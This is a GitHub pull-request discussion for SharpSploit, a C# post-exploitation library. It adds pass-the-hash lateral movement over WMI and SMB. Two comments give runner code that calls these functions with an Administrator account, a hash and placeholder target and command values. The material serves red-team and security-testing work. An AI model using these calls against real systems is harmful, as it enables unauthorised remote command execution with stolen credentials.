cobbr / SharpSploit

SharpSploit is a .NET post-exploitation library written in C#
https://sharpsploit.cobbr.io/api/
BSD 3-Clause "New" or "Revised" License
1.75k stars 307 forks

Merge pth into master #44

Open checkymander opened 4 years ago

checkymander commented 4 years ago

Added pass-the-hash functionality into SharpSploit, WMIExecute and SMBExecute, based on the Invoke-TheHash codebase. The code can be tested with the following runner:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>"));

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

The library supports both Admin Check functionality and command execution, with support for WMI, SMB1, and SMB2 (including signing).

checkymander commented 4 years ago

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(WMI.WMIExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false));

            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>"));

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

Updated example code to reference the new function names.

edermi commented 3 years ago

Any chance to get this merged into master? Would love to see this in Covenant in the long run.